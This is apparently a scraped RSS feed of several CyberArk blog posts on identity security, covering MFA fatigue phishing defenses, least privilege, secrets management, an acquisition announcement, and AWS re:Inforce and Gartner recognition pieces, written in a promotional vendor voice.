  • Tackle things in phases. Follow a program roadmap and a risk-based approach, drawing from data insights gleaned from discovery scanning exercises. Goal posts may need to shift from time to time, but the focus should always be to put the ball in the net. When you do, celebrate those milestones – they’re important.

Today, the Diamond Trust Bank IAM team is enabling the digital business by providing fast and secure connections for vendors in 14 different countries around the world – and counting. “Today, there is an equal volume of internal and external traffic accessing CyberArk,” says Mawani. “And the journey continues.”

]]>
Don’t Fall for MFA Fatigue or Next-Level Phishing Attacks https://www.cyberark.com/blog/dont-fall-for-mfa-fatigue-or-next-level-phishing-attacks/ Thu, 18 Aug 2022 13:00:31 +0000 https://www.cyberark.com/?p=133528 Phishing

Phishing attacks are pervasive, whether you work at a global telecommunications company or a small local retail shop. Fortunately, employees have come a long way in spotting phishing attempts, especially those of the email variety: Only 2.9% may click on phishing emails, according to the latest Verizon DBIR. Yet attacks on several large technology firms show how sophisticated some multi-pronged phishing schemes have become.

5 Common Factors Observed in Recent Major Phishing Attacks

Like a choose-your-own-adventure book, phishing can be approached from any number of angles, using an ever-expanding list of attack tactics, techniques and procedures (TTPs). What blocks a phishing attempt one day might not stop the next spoof – making layered defenses a must. Understanding where to focus, and when, can help cyber defenders gain an edge. To that end, we’re exploring five factors observed across these high-profile phishing attacks, along with cyber risk reduction tips from our CyberArk Labs and Red Team.

Phishing Attack Commonalities

1. Social engineering to identify individuals working at specific technology organizations.

Cyber risk reduction tip: Recently surveyed security leaders ranked security awareness training as the second most effective defense-in-depth strategy for ransomware protection. Conduct routine training and education sessions to help embed security-conscious behavior into organizational culture – and keep employees informed of evolving social engineering and phishing attack techniques. Consider enhancing these trainings with ethical phishing exercises. And make sure your spam filters are working as they should to stanch the flow of suspicious emails, bulk campaigns and unsolicited marketing materials from reaching employee inboxes.

2. Identity compromise via first-factor credential theft to enter network. For instance, through man-in-the-middle (MitM) attacks that intercept passwords, or by targeting cached passwords stored in users’ browsers.

Cyber risk reduction tip: Awareness campaigns cannot always prevent a user from getting phished. Says Shay Nahari, VP Red Team Services at CyberArk, “In the grand scheme of defense strategies, endpoint privilege management that can protect client-side credentials – and help prevent the theft of cookies that could enable MFA bypassing – is an important layer.” When deploying endpoint security controls, consider prioritizing users who have a record of clicking on phishing attempts. 

3. MFA fatigue attacks utilizing SMS and voice phishing to impersonate trusted sources, solicit the user to approve MFA notifications, “fatigue” the user with numerous MFA pushes, then gain access to the corporate VPN and other target systems once the user responds to the push.

Cyber risk reduction tip: Attackers continue to find new ways to target MFA and circumvent security controls. Selecting phishing-resistant MFA factors, such as a FIDO, QR codes or physical tokens, can help thwart these efforts.

One method to mitigate MFA fatigue is switching your organization’s MFA setting or configuration to require a one-time password (OTP) versus a push notification,” says Nahari. “When faced with repeated authentication messages and touchpoints, users can often become careless and unwittingly create openings for attackers. While OTP requires more involvement from the user, it can mitigate the risk associated with MFA fatigue.”

He continues, “As part of my team’s adversary simulation exercises, we look at different types of detections, including hard indicators of compromise (IOCs). Hard IOCs are fundamental to a specific attack. In the case of MFA fatigue, the attacker already has access to credentials and needs to solicit the user to approve the MFA notification in order to gain access. If an organization is successful in blocking MFA fatigue, the attacker will be forced to choose another attack path. The OTP configuration can make the user less susceptible to this type of attack and significantly reduce risk.”

A more user-friendly approach is to require number matching for successful MFA authentication. With number matching, users responding to MFA push notifications using the authenticator app are presented with a number. They must type that number into the app to complete the approval. During a phishing attack, the end-user has no knowledge of the correct number sequence and therefore cannot approve the request.

When protecting against MFA attacks of all sorts, it’s important to mandate MFA anytime a personal profile is changed to keep malicious actions from going unnoticed, and set up proactive reviews of risky events. Additionally, your SOC can leverage user behavior analytics to set contextual triggers that notify if anomalous behaviors are detected, or block user authentication from suspicious IP addresses.

4. Lateral movement to establish persistence, cover up tracks and compromise additional systems and servers. Privilege escalation to reach critical systems, including domain controllers.

Cyber risk reduction tip: Enforce least privilege across all infrastructure, applications and data. It seems like a straightforward concept, yet it can be particularly challenging to do at scale. That’s where intelligent privilege controls come in, helping to seamlessly secure access for all identities and flexibly automate the identity lifecycle with continuous threat detection and prevention, along with behavioral analytics, to protect your most critical assets.

5. Data exfiltration.

Cyber risk reduction tip: In one of the latest phishing attacks, threat actors reportedly attempted to get back into the network after exfiltrating data and being detected and removed. To do so, they targeted employees who may have made single character changes to their passwords after a mandatory credential reset. Fortunately, the attackers were unsuccessful, but strong password practices are always worth reiterating. Better yet, take the burden off users completely by giving them a way to automatically generate unique and strong passwords.  

Phishing has reached new levels of innovation, with recent events showing just how far attackers will go to dupe their unsuspecting – or MFA-weary – victims. Effective anti-phishing protection should involve both technical and human elements of security, assume that rogue clicks are inevitable, and focus on catching threats quickly before they become bigger phish to fry.

]]>
Identity Security: Putting It All Together https://www.cyberark.com/blog/identity-security-putting-it-all-together/ Thu, 11 Aug 2022 13:00:04 +0000 https://www.cyberark.com/?p=133230 Identity Security: Putting It All Together

Here at CyberArk, we’ve been sharing how Identity Security offers a modern approach grounded in Zero Trust and least privilege to protect organizations’ most critical assets. In recent weeks, we’ve emphasized our Identity Security vision; our unified platform approach; and our continued work in shaping and advancing the Identity Security market.

Centered on intelligent privilege controls, Identity Security works to seamlessly secure access for all identities, flexibly automate the identity lifecycle and provide continuous threat detection and prevention. To help our readers envision how this all comes together, we’re sharing a “day in the life” story of Rachel, a developer working on a major app launch. We’ll also sprinkle in some real-world examples of Identity Security in action, as shared by CyberArk customers during our recent Impact 2022 event.

Seamless and Secure Access for All Identities

For Rachel, a protected and productive day starts with seamless, secure access. She’s just dropped her kids off at school, poured a cup of coffee, and is now logging into her laptop from her home office using adaptive multi-factor authentication (MFA). As Rachel “knocks on the door” to request access to the corporate network, that “knock” is compared with her historical user behavior data, which shows that she typically logs in around 8:30 a.m. EDT from an IP address in the Philadelphia area – exactly what she’s doing now. If suspicious activity occurs, such as multiple failed login attempts, she is prompted for additional authentication factors.

Some organizations focus on this “people” part of Identity Security first. After all, humans continue to play a significant role in security incidents, with 82% of breaches in 2021 involving the human element.

Identity Security in the Real-World: Responsible for taming access sprawl across a massive portfolio, a CISO at a large consulting firm set an initial goal of protecting all workforce and customer identities. His team rolled out a series of strong access management controls to improve the organization’s overall security posture and its ability to defend against attacks at scale. Coupling these “wins” with mounting cyber insurance requirements, he built a compelling case for a unified Identity Security program. His team is now rolling out privileged access management to better understand – and demonstrate to insurance carriers – who or what has access to which sensitive resources, for what reasons and for how long.

Intelligent Privilege Controls

Back to our friend Rachel, who’s writing code in the cloud – something that requires her to access highly sensitive DevOps and CI/CD resources and tools. Rachel’s also got a handy bot helping her out behind the scenes so she doesn’t get bogged down with committing code to a repository. To do this, the bot needs privileged credentials. Some bots have credentials or secrets embedded into their scripts for efficiency’s sake, but that makes it easier for attackers to sniff them out.

Instead, intelligent privilege controls – the heart of Identity Security – are applied to both Rachel (the privileged human identity) and her trusty bot (the privileged machine identity). This enables Rachel to get into her cloud workspace, but only with minimal required access and for the least amount of time necessary. Meanwhile, the bot’s secrets are centrally secured and managed and can be retrieved exactly when they’re needed.

But it’s not just privileged identities that companies need to think about. In today’s environment, sensitive resources can live anywhere – and they’re widely accessible: 68% of non-humans or bots and 52% of workforce employees have access to sensitive data and assets. And virtually any identity can gain privileged access, depending on the context. Because of this, many organizations begin their Identity Security journeys with privileged access management.

Identity Security in the Real-World: For instance, a large regional bank in Africa focused initially on enforcing least privilege across all privileged and non-privileged workforce users to satisfy new SWIFT Customer Security Controls Framework (CSCF) requirements. When COVID-19 surged, the bank’s identity and access management (IAM) team quickly shifted focus to off-site vendors to help ensure secure third-party access to critical internal resources. By operationalizing vendor onboarding and access, the team is providing fast, secure connections for vendors in 14 different countries. The bank’s IAM team is now looking to extend Identity Security protections to the cloud and its software supply chain.

Continuous Identity Threat Detection and Prevention

Let’s check back in with Rachel, who has privileged access to cloud infrastructure, but is also considered a “workforce user,” who is part of a hybrid workforce team. She’s just opened a browser tab for a popular project management app to ask a colleague a question. Sure, it’s an everyday interaction, but this app happens to contain a trove of IP data in the chat files.

If a threat actor from within or outside of Rachel’s company were able to guess or steal her password, they could log in, start rummaging around and find this confidential information. This is where privilege controls like session monitoring and AI-powered Identity Security Intelligence capabilities can detect threats earlier in the attack cycle. And automated authentication prompts can double-check that the person who initiated the session is the one who is still using the application as another security layer.

Identity Security in the Real-World: At Impact, an IAM leader at a multi-national investment bank recounted how limited visibility into user activity within web-based apps and cloud consoles made it difficult for his team to catch misuse or abuse of access to business applications. This was especially concerning since web-based management consoles allow users to make configuration changes and updates that can impact entire companies. By implementing controls such as continuous monitoring and authentication over these sensitive apps and tools, his team can more quickly identify, investigate and respond to production issues and risky user actions, while maintaining a low-friction user experience.

Flexible Identity Automation and Orchestration

Six months later, Rachel has decided to leave her current job and take a position elsewhere. Her employer has experienced significant churn over the past few years, which can make the process of manually provisioning and deprovisioning access an operational nightmare. Fortunately, by applying lifecycle management controls, the organization’s IT team can automatically shut off Rachel’s access and permissions at just the right time – free of human error. Not only does this help reduce cyber risk, but it also prevents cybersecurity debt accumulation in the form of unused and misconfigured identities. Meanwhile, the trusty helper bot retains its access and keeps working in support of another member of the development team.

Identity Security in the Real-World: In another example, a leading biotech company streamlined the management of application access requests across its business, in addition to enforcing MFA for all external network access and standing up a hybrid authentication and authorization system. Through it all, one tenet became abundantly clear to the organization’s senior IT architect of IAM: Never lose sight of the human owner behind the application. During Impact, he emphasized the importance of an organized directory that maps SSO apps to their respective owners, with redundant contacts, to improve SSO issue responsiveness and change communication. He spoke of automation’s key role in advancing IAM service delivery – and how, in his view, IDP platforms will increasingly focus on mapping application ownership and actively involving these stakeholders in the SSO application lifecycle journey.

Getting Started with Identity Security

Wherever you choose to start your Identity Security journey, the end goal should be the same: Secure any human or machine identity that’s accessing your organization’s resources from anywhere and to the widest range of resources or environment – all done in a way that enables Zero Trust by enforcing least privilege.

As illustrated by these real-world success stories, with a unified approach to Identity Security, your organization can effectively defend against attacks and satisfy audit and compliance, while unleashing new levels of operational efficiency and propelling digital innovation forward.

 

 

]]>
CyberArk Acquires C3M, Accelerating Cloud Privilege Security and Cyber Risk Reduction https://www.cyberark.com/blog/cyberark-acquires-c3m-accelerating-cloud-privilege-security-and-cyber-risk-reduction/ Wed, 10 Aug 2022 12:50:43 +0000 https://www.cyberark.com/?p=133181 CyberArk C3M

In 2018, as cloud adoption was nearing a tipping point, and a series of major cyber attacks signaled the rise of the cloud service misconfiguration error, we founded C3M on the belief that cloud security done right can help safeguard organizations from costly data breaches and satisfy regulatory obligations. We’ve been honored to work alongside enterprises around the world, helping them seamlessly and securely embrace the full benefits of their Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP).  

Today, 89% of organizations use multiple cloud providers, with 63% of these organizations running more than 25% of their workloads in the cloud. As our journey to create a more secure and compliant cloud ecosystem continues, I’m excited to share that CyberArk has acquired C3M. 

Together, we have an opportunity to simplify the complex challenge organizations face in managing and securing all identities – human and machine – as they access sensitive resources and data in hybrid and multi-cloud environments. With a shared vision, an exceptional collaborative team, and the power of the market-leading CyberArk Identity Security Platform, we are setting a new industry standard for Cloud Privilege Security 

As the number of identities continues to grow exponentially, we’re hitting the ground running to accelerate the delivery of Identity Security innovations that help organizations to analyze, monitor and secure access to public cloud resources and achieve measurable cyber risk reduction.  

Accelerating Cloud Privilege Security Innovation Together  

Here’s a look at CyberArk’s comprehensive Cloud Privilege Security SaaS offerings, and how C3M talent and technologies will bolster specific analysis and monitoring capabilities to empower organizations to intelligently secure privileged access in the cloud.   

Identity Security Platform Cloud Privilege Security

Analyze. Analyzing access in a cloud environment is a critical first step for safe and responsible cloud consumption. However, organizations can only mitigate the risks that they know exist. CyberArk Cloud Entitlements Manager analyzes and visualizes permissions across AWS, AWS Elastic Kubernetes Service (AWS EKS), Microsoft Azure and GCP, then provides policy recommendations to remove excessive permissions that violate least privilege access. Bringing C3M’s automated threat detection and incident capabilities for identity-related compliance violations and misconfigured cloud resources, coupled with behavioral baselining and risk-scoring for all identities, will further strengthen CyberArk’s intelligence and analytics offerings.   

Monitor. Monitoring identities as they access cloud resources is another essential Cloud Privilege Security component that allows organizations to rapidly identify and respond to misuse. The CyberArk Identity Security Platform already provides session auditing for both shared and Just-in-Time sessions to cloud resources. C3M will layer on additional monitoring capabilities that enhance cloud security teams’ ability to automatically identify risky behavior in the public cloud and continuously monitor specific resources.  

Secure. Intelligent privilege controls are the foundation of Identity Security. As organizations move to the cloud, enforcing least privilege everywhere is a key to enabling Zero Trust. CyberArk’s industry-leading Cloud Privilege Security capabilities, such as CyberArk Dynamic Privileged Access and CyberArk Secure Cloud Access, enable organizations to secure all identities that connect to cloud resources across shared account and federated access models. Only CyberArk helps secure both standing and Just-in-Time access across hybrid and multi-cloud environments.  

Joining with CyberArk is the next phase of our journey at C3M. We are extremely proud of the company we’ve built. We set out to build the world’s most comprehensive cloud security platform, and now, as part of a world-leading R&D organization that’s shaping the future of Identity Security, I’m confident we will do just that. I could not be more excited about what’s to come.  

Padmanabhan Viswanathan (Paddy) is founder and former CEO of C3M, and current VP of Cloud Security at CyberArk 

]]>
6 Identity Security Soundbites from David Higgins, CyberArk EMEA Technical Director https://www.cyberark.com/blog/6-identity-security-soundbites-from-david-higgins-cyberark-emea-technical-director/ Fri, 05 Aug 2022 13:00:51 +0000 https://www.cyberark.com/?p=133143 6 Identity and Cybersecurity Quotes

CyberArk EMEA Technical Director David Higgins works closely with some of the world’s largest and most heavily regulated organizations in architecting Identity Security strategies that help mitigate cyber risk and confidently enable digital business. Higgins recently sat down with Cybernews to explain how Identity Security fits into organizations’ broader cybersecurity programs and helps enable Zero Trust.

Here are six of our favorite soundbites from the conversation, which we’ve edited for length and clarity:

1. Identity is almost always the ingress point in the cyber attack chain. “Identity remains the go-to for threat actors looking for an effective and swift entry point to a business,” Higgins explains. For every human identity, there are 45 machine identities — and over half of an organization’s workforce has access to sensitive corporate data. These identities represent an expanded attack surface that adds pressure to mounting cybersecurity insurance and compliance requirements. “It’s a problem that’s getting larger and more complex as digital IT environments change, and malicious actors continually find new ways into their targets through identity compromise,” Higgins continues.

2. Yet it’s not always a security priority. “Less than half (48%) of organizations have Identity Security controls in place for their business-critical applications, to name just one key environment,” says Higgins. As organizations continue to embrace the cloud and prioritize major transformation projects, the number of digital identities continues to grow while cybersecurity investment lags. This causes an accumulation of cybersecurity debt that exposes organizations to even greater risk.

3. Identity Security’s role in Zero Trust. “The age-old adage that those protecting themselves need to get it right 100% of the time, whereas attackers only need to get it right once to wreak havoc, still holds true. That’s why Zero Trust’s premise — never trust, always verify — is vital to any forward-thinking cybersecurity strategy,” says Higgins. Identity Security is not Zero Trust, but instead, it encompasses key security layers — such as privileged access management, identity management, cloud privilege security and secrets management — that organizations need to defend against attacks, measurably reduce cyber risk, and ultimately, enable Zero Trust.

4. Why the Log4j vulnerability highlighted inherent risks across the software supply chain. “One type of attack can rarely be universally applied to so many different targets, and that’s what makes Log4j so serious. It can be likened to a wobbly Jenga block holding a towering puzzle above: If one brick at the bottom falls, the whole thing comes down,” Higgins explains.

5. How organizations can strengthen cyber resilience in preparation for the next major software supply chain vulnerability, ransomware attack or emerging threat. “It’s impossible to keep out every attack, every time,” notes Higgins. “Instead, the focus and best practice should be around working to prevent attackers from moving to their objective – whether that is to spread malware, harvest data or shut down a critical service – once they are inside a system. This starts with identity … By securing routes to their most critical assets with intelligent privilege controls; seamlessly securing access for all identities with strong, adaptive authentication; and removing hard-coded secrets to protect credentials across the CI/CD pipeline, an organization can dramatically improve its overall security posture.”

6. Attackers never stop innovating. “Cybercriminal groups are increasingly operating like legitimate businesses. This way of working means large criminal groups have unwittingly created their own attack surfaces, opening themselves up to risk,” says Higgins. “It’s likely that the need to secure themselves internally will force security to revamp – as adversaries will increasingly get caught by defenders using their own attack methods against them. This change may bring with it plenty of new, innovative tactics, techniques and procedures that organizations need to be prepared to protect against.”

Today’s fast-evolving threat environment requires a security-first approach to protecting human and machine identities, one capable of outpacing attacker innovation. For more Identity Security perspectives, read the full Cybernews interview.

]]>
5 Hot Takes from AWS re:Inforce 2022 https://www.cyberark.com/blog/5-hot-takes-from-aws-reinforce-2022/ Fri, 29 Jul 2022 13:00:19 +0000 https://www.cyberark.com/?p=133091 5 Hot Takes from AWS re:Inforce 2022

The city of Boston was hot this July – and we’re not just talking about record-breaking temperatures. The cybersecurity community showed up and turned up the heat, exploring Identity Security-fueled strategies at CyberArk Impact, then advancing critical cloud conversations on identity, security and privacy at AWS re:Inforce. With so many burning topics on our minds, we’re coming in hot with five key takeaways from AWS’ annual cybersecurity conference.

1. Identity Security is the Core of Cloud Security

“Identity,” as Karen Haberkorn, director of product management for AWS IAM, described it, “is any uniquely recognizable entity that requires access to [AWS] resources.” Your cloud or hybrid architecture is sure to be crowded with identities – from human identities like internal employees and third-party vendors to machine identities like service accounts or AWS Lambda serverless functions. Any of these identities can be exploited to gain access to critical cloud infrastructure, steal or alter sensitive data, or interrupt cloud-hosted services. The message was clear: Identity is the core of cloud security.

Haberkorn stressed fundamental Identity Security best practices worth repeating: Federate human access, require multi-factor authentication (MFA), apply least privilege least privilege permissions, rotate access keys regularly, safeguard root user credentials, and regularly review and remove unused access. Many presenters echoed this guidance, while emphasizing consistency, simplification and granularity as keys to strong identity-based security, access control and resource management.

2. Least Privilege Access Is Essential – and It Must Balance with Business Needs

AWS Chief Security Officer Stephen Schmidt believes that “who has access to what, and why?” is one of the most important security questions. “An overly permissive environment guarantees you headaches,” agreed AWS CISO CJ Moses. Why? Because “humans and data don’t mix!” Having a least privilege scheme is a non-negotiable defense-in-depth mechanism – now more than ever, given the key roles of lateral movement and privilege escalation in ransomware and software supply chain attacks.

Moses pointed out the central role of just-in-time provisioning in a least privilege model, as always-on, standing access presents notable risk. “If you’re on vacation, your access should be as well,” he noted. Further guidance from AWS leadership on restricting access to sensitive resources based on user location drove this point home. But don’t jump into privileged access management without a plan, cautioned a speaker from a major financial institution. Long-term security controls cannot be exclusively tied to short-term organizational structures. Security needs a stable foundation, it needs to strike the right balance between control and flexibility, and it needs a solid roadmap.

3. You Can’t Buy Zero Trust — Defense in Depth Is How to Get There

Least privilege is a cornerstone of Zero Trust – another hot topic at the show. But there isn’t a security tool on the planet that can flip on a Zero Trust switch. Every organization needs multiple lines of defense because “single controls will fail,” said Moses. He emphasized the need for independent, yet integrated, controls that talk to one another as part of a cybersecurity mesh architecture, and urged organizations to embrace their responsibilities in protecting data, applications, endpoints, networks and identities in their hybrid cloud environments. Some defense-in-depth directives were inescapable, like one keynote slide featuring just two words: “Enable MFA.” If you haven’t done it, do it. Full stop.

And speaking of hot topics, “user experience” would have been a winning buzzword bingo square. Winston Churchill’s “we shape our buildings; thereafter they shape us” quote captured the need for security programs built for actual people. Enhancing the end-user experience with things like native session isolation and unified administration of security controls, for instance, makes it easier for people to do the right thing.

4. Provable Security Starts with People

While AWS re:Inforce is a technology conference, the human side of cybersecurity was featured prominently. We heard about AWS’ goal of creating a “culture of provable security” – one in which everyone is accountable. Look for “changing moments” to reinforce security culture and remember that diversity brings more diversity to give your cybersecurity program a critical edge, encouraged AWS leaders. BUT, they also warned against “relying on heroics” from staff. Even the best security practitioners need ways to automate and simplify their work so they can stop threats before they stop business. This, too, makes interoperability and technology integrations essential.

5. Software Supply Chain Security Must Be Smart and Simple

Log4j and SolarWinds-type attacks are a reality, which is why it’s so important to bake security and continuous risk monitoring into CI/CD pipelines and application portfolios, noted AWS and third-party experts. Weaving security into the development lifecycle and operations also makes security reviews quicker and more uneventful, helping to keep projects – and budgets – on track. At the end of the day, keynote speakers said, the goal should be to make the secure path the path of least resistance. Otherwise, people will keep finding ways around it.

AWS Marketplace Vendor Insights is a great example of smart software supply chain security in action. Announced at the show, the new service provides continuous risk monitoring for all vendors on the AWS Marketplace, so if a vendor’s security risk profile changes, AWS customers using that vendor’s services will be notified.

We’ll wrap things up with a favorite soundbite from the show: “Security can’t be the office of no, but rather partners to enable the business by saying ‘Yes, but …’ or ‘Yes, and …’” We couldn’t agree more – in fact, allowing developers to use their preferred cloud-native tools while security teams can manage secrets with CyberArk is exactly what our newly announced Secrets Hub aims to do. We had a lot of fun at the AWS re:Inforce CyberArk booth demonstrating how developers can keep using native tooling while security teams gain centralized visibility and control of application secrets.

We also showed how CyberArk Identity SSO now integrates with AWS Control Tower, unlocking better security and governance in the cloud.

Read “Identity Security: Why It Matters and Why Now” to learn more about how an Identity Security-first mindset can help strengthen and reinforce your cybersecurity program.

]]>
9 Reasons to Simplify Secrets Management https://www.cyberark.com/blog/9-reasons-to-simplify-secrets-management/ Wed, 27 Jul 2022 13:00:48 +0000 https://www.cyberark.com/?p=133027 Easy Secrets Management for DevSecOps

Eighty-seven percent of IT decision-makers1 say their organizations are implementing DevOps, yet achieving DevSecOps excellence isn’t easy, especially as machine identities and secrets continue to pile up across development pipelines and application portfolios. While there isn’t one specific standard for evaluating DevSecOps maturity, most teams would agree that both speed and security are critical metrics — and that the two are at constant odds.

As organizations continue to move to the cloud and evolve hybrid architectures, here are nine reasons why developers need a simplified approach to secrets management to keep moving fast while giving security teams a streamlined way to enforce policies.

1. “Elite” DevOps organizations — or the highest-performing teams — routinely deploy on demand and perform multiple deployments per day.2 For instance, Amazon engineers reportedly deploy code every 11.7 seconds, on average.3

2. Compared to low-performing teams, elite DevOps teams have 973x more code deployments, and a 6570x faster lead time from commit to deploy.4 To put it simply, they focus on fast.

3. CI/CD pipeline automation enables these DevOps teams to build and deploy applications at unprecedented speed and scale. It also creates new machine identities and application secrets — credentials, SSH keys, certificates, API keys — in massive quantities. Today, machine identities outnumber human identities 45:1.5

4. In half of organizations,6 the task of securing application secrets is left up to developers, who often emphasize speed and collaboration over proper security practices as they work under increasing pressure and tight timeframes.

5. In fact, 36% of developers say meeting deadlines7 is the primary reason their coding still possesses vulnerabilities. Yet cybersecurity debt in the form of unsecured secrets in code can compound rapidly with every release.

6. Security teams face an extremely difficult balancing act of enabling development velocity while consistently enforcing fundamental cybersecurity policies, such as least privilege, across the organization: 80% admit that developers have more privileges than they need.8

7. Many organizations rely on the native secrets management capabilities in their cloud and DevOps tools to simplify development and operations. But when secrets are stored and managed differently across various teams and projects — which 87% of organizations say is the case9 — “secrets sprawl” can cause conflict with centralized security goals, create opportunities for cyber attackers and have a dangerous ripple effect down the software supply chain.

8. Seventy-one percent of organizations suffered a successful software supply chain-related attack that resulted in data loss or asset compromise in the last 12 months.10

9. Shifting left by finding a more secure, consistent way to access secrets doesn’t just enhance overall cybersecurity posture — it can also unlock new levels of efficiency. Streamlining and automating secrets management processes, such as onboarding applications and rotating secrets, can accelerate cloud migration efforts by unblocking development, keeping existing workflows intact and making it easier for developers to code securely from the start. It’s by integrating security practices throughout the development process that top-performing DevOps teams are 1.6 times more likely to meet or exceed their organizational goals.11

As you build out your comprehensive Identity Security program, securing machine identities and application secrets everywhere they exist is critical to reducing security vulnerabilities, minimizing the attack surface and streamlining operations. But it can’t slow down development teams or delay automation initiatives. After all, speed is the currency of business.

With the right centralized secrets management approach, you won’t have to choose between speed and security as you work toward DevSecOps maturity — you’ll get the best of both worlds.

4 reasons to centralize secrets management

With CyberArk, you can strengthen security across the DevOps pipeline and add value to enable your digital business. Our recently launched Secrets Hub, a SaaS solution that is part of the CyberArk Identity Security Platform, delivers effective secrets management in hybrid environments, fulfills developer preferences for choice and gives security teams a way to retain centralized control and enforce unified policies over secrets using existing processes and infrastructure.

SOURCES

1: Puppet 2021 State of DevOps Report

2,4,11: Accelerate State of DevOps 2021 Survey

3: Tech Beacon, “10 Companies Killing it at DevOps”

5,6,8,9,10: CyberArk 2022 Identity Security Threat Landscape Report

7: HelpNetSecurity, “86% of Developers Don’t Prioritize Application Security”

]]>
CyberArk Named a Leader in the 2022 Gartner® Magic Quadrant™ for PAM Again https://www.cyberark.com/blog/cyberark-named-a-leader-in-the-2022-gartner-magic-quadrant-for-pam-again/ Fri, 22 Jul 2022 15:34:45 +0000 https://www.cyberark.com/?p=132783 CyberArk a PAM Leader Gartner Magic Quadrant

CyberArk is proud to announce it has been named a Leader in the 2022 Gartner® Magic Quadrant™ for Privileged Access Management.1 The company was positioned both highest in ability to execute and furthest in completeness of vision for the fourth time in a row.

According to Gartner, “While core PAM products continue to be important security tools, shifting demand in the market has brought new emphasis on the cloud, from SaaS delivery of PAM tools, to expanding the functionality for cloud security in PAM tools, including secrets management and CIEM.”2

We thank our customers and partners for inspiring and driving us fearlessly forward each day to innovate and be their trusted advisor. We also want to thank our employees across the globe for always putting customers first and for their outstanding dedication. This distinction is because of you.

CyberArk’s PAM Point of View: Our History and Identity Security’s Grounding Center

Privileged access management is the strong foundation upon which CyberArk was built — it’s who we are and what we proudly introduced to the market. Since the beginning, CyberArk has brought a security-first mindset aimed at helping global organizations protect the heart of the dynamic enterprise. As we’ve continued to evolve as an organization, privileged access management has remained solidly in place as our core. Today, more than 7,500 customers, including the majority of Fortune 500 companies and many government organizations around the world, trust CyberArk to secure their most valuable assets.

Grounded in privileged access management, we have become much more with the development of a holistic Identity Security Platform capable of enabling digital transformation and helping to stop more sophisticated cyber threats. Picture a massive constellation of user identities — human and machine — accessing various corporate resources from homes, offices, co-working spaces and public transport, and spanning data centers, operational technologies, and hybrid, multi-cloud and SaaS environments. Every single identity is a target for attackers. Every single identity can have powerful privileged access. And because of this, every single identity needs strong security protections.

Since CyberArk put a stake in the ground detailing our expanded Identity Security vision and strategy, we’ve continuously raised the bar for innovation and progressed further along our roadmap. We believe Identity Security — which unifies privileged access management, access management and identity management in a single platform that can enable seamless, secure access for any identity to any resource or environment from anywhere using any device — is the key to strengthening cyber resilience and unlocking greater operational efficiency. And as organizations of all sizes and kinds move toward a Zero Trust future, the ability to dynamically enforce policy, authentication and authorization will help pave the way.

In our view, it has never been more important to consistently enforce least privilege everywhere with standing and just-in-time access, session isolation and monitoring, elevation and delegation, and credentials and secrets management. Today’s challenges — and the ones yet to come — call for an advanced, unified approach that centers on these intelligent privilege controls, while enabling seamless, secure access for all identities, and flexibly automating the identity lifecycle with continuous threat detection and protection. This is Identity Security, and we believe now is the moment to embrace it.

Our focus at CyberArk remains solidly on execution. Earlier this month at CyberArk Impact 2022, we announced new innovations and significant advancements in privileged access management, identity management, cloud privilege security, and secrets management to give organizations the confidence they need to accelerate business transformation with less risk. And to echo CyberArk Founder, Chairman and CEO Udi Mokady, “We are just getting started.”

Download the Full Complimentary Report

To learn more, download the full 2022 Gartner Magic Quadrant for Privileged Access Management report.

 

1,2 – Gartner® Magic Quadrant™ for Privileged Access Management, by Michael Kelley, James Hoover, Felix Gaehtgens, Abhyuday Data, 19 July 2022

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

]]>
What to Do When Digital Identities Start Doing “Stranger Things” https://www.cyberark.com/blog/what-to-do-when-digital-identities-start-doing-stranger-things/ Wed, 20 Jul 2022 13:17:29 +0000 https://www.cyberark.com/?p=132722 What to Do When Digital Identities Start Doing “Stranger Things”

The long-awaited volume 2 of “Stranger Things” season 4 dropped this month. Fellow fans likely tracked three unique storylines this season, and it was a good thing the last two episodes were feature-length, because we had a lot of questions. Now that CyberArk Impact 2022 has wrapped, we have some time to get caught up!

A particularly gruesome “Stranger Things” plotline that kept everyone guessing was the one in which teenagers across the town of Hawkins started getting killed, one by one. But before each person met their untimely demise, they started acting … well, strangely … experiencing headaches and nightmares suggesting that Vecna, the mysterious evil being from the Upside Down, was beginning to take hold. This foreshadowing helped viewers brace for the grisly scenes ahead, and fed fan theories about how the season would play out. (We won’t give away any more than that!)

Beyond the Upside Down in a different shadowy realm, cybersecurity teams also look for digital clues such as hashes, domain names, IPs and DNS requests that could signal potential problems. Many rely on security information and event management (SIEM) tools to aggregate and analyze large volumes of threat data. But when it comes to detecting strange or risky behavior linked to authorized users – workforce or privileged identities within their organizations or those associated with third-party vendors – these teams are often in the dark until after systems have been compromised and damage is done.

A big part of the problem is that identity-driven attacks from inside are especially hard to detect. While most organizations have made Identity Security investments to secure privileged access to sensitive resources, they lack visibility and control over what is being done during legitimate user sessions and how confidential data is being handled. Unlike “Stranger Things” viewers, security teams don’t have the benefit of looming grandfather clock visions or ominous ticking noises in the background to put them on high alert.

Instead, malicious insiders (or external attackers posing as legitimate insiders) abuse credentials to progress their attacks, quietly looking for ways to bypass privileged access management controls on sensitive systems. Without a reliable, automatic way to respond to such attempts, organizations have a significant blind spot: 80% of enterprise security leaders report employee misuse or abuse of access to business applications, which often contain high-value data like financial records, customer or patient information, or intellectual property. And nearly half say they have limited ability to view user logs and audit user activity, making it difficult to pinpoint risky behavior.

How to Detect and Block “Strange” User Behavior – Before Time Runs Out

Manually investigating questionable user activity eats up time and valuable resources, as does auditing entire user sessions without the aid of risk scoring to flag strange or risky activity. These inefficient processes can often cut into other critical cybersecurity priorities, such as shoring up ransomware protection and bolstering incident response.

Fortunately, much like the headaches and creepy background music signaling that “stranger things” are about to take place on the TV show, behavioral abnormalities (i.e., abnormal login behavior or signs of potential theft of privileged credentials) can indicate that risky or malicious activity is happening in your IT environment.

Identity Security programs take advantage of analytics to build behavioral baselines for the workforce and privileged users within an organization. Using this baseline, and with the help of artificial intelligence, teams can continuously analyze user behaviors and workforce identity patterns at scale, automatically detecting strange or risky privileged security events earlier in the attack lifecycle. For instance, they could configure security controls and define rules to receive instant alerts if an employee enters a risky command during a privileged session or tries to delete or export sensitive files from a web application.

